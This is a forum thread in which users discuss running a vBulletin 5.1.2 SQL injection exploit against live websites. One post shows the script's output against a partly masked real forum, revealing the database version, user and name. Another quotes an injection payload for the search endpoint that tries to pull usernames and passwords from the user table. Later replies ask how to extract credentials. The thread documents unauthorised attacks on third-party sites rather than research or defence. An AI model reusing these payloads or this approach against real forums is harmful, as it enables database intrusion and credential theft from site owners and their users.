askwrite Posted July 22, 2014 Report Share Posted July 22, 2014 how fix mr Nytro ?The vB must have version 5.1.2 Quote Link to comment Share on other sites More sharing options...
k3nt_black Posted July 23, 2014 Report Share Posted July 23, 2014 The vB must have version 5.1.2I know bro ... but Exploit have error any time .. Tested vb 5.1.2 Any site Quote Link to comment Share on other sites More sharing options...
Nytro Posted July 23, 2014 Author Report Share Posted July 23, 2014 Those are probably fixed. The exploit does NOT check if the forum is vulnerable.If it shows this error on Home - vBulletin Community Forum it means it was fixed. Quote Link to comment Share on other sites More sharing options...
k3nt_black Posted July 23, 2014 Report Share Posted July 23, 2014 test it --> Forums - ????? ??????? ????? ?????VB= 5.1.2 Vulphp vbnew.php Forums - ????? ??????? ????? ?????Romanian Security Team - vBulltin 5.1.2 SQL InjectionVersion: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93 Quote Link to comment Share on other sites More sharing options...
Eric Posted July 23, 2014 Report Share Posted July 23, 2014 test it --> Forums - ????? ??????? ????? ?????VB= 5.1.2 Vulroot@printer:/tmp# php a.php http://forums.p*****ter.comRomanian Security Team - vBulltin 5.1.2 SQL InjectionVersion: 5.6.17User: FOrpOWOm_1Databse: FOrpOWOm_1Merge ma, ce aveti ? Daca va da erroarea aia inseamna ca e fixat sau nu e vulnerabil. Quote Link to comment Share on other sites More sharing options...
kkonxy Posted September 14, 2014 Report Share Posted September 14, 2014 Is there any protection on the password columns?select salt from user where userid='1' (works)select password from user where userid='1' (not works)Thanks for the exploit nice found How to modify the query to get something more than this ? 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(concat(username, 0x3a,password) FROM user, 1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');Doesn't work ;-( Quote Link to comment Share on other sites More sharing options...
VaiLong Posted June 23, 2016 Report Share Posted June 23, 2016 How to get username and password? 1 Quote Link to comment Share on other sites More sharing options...
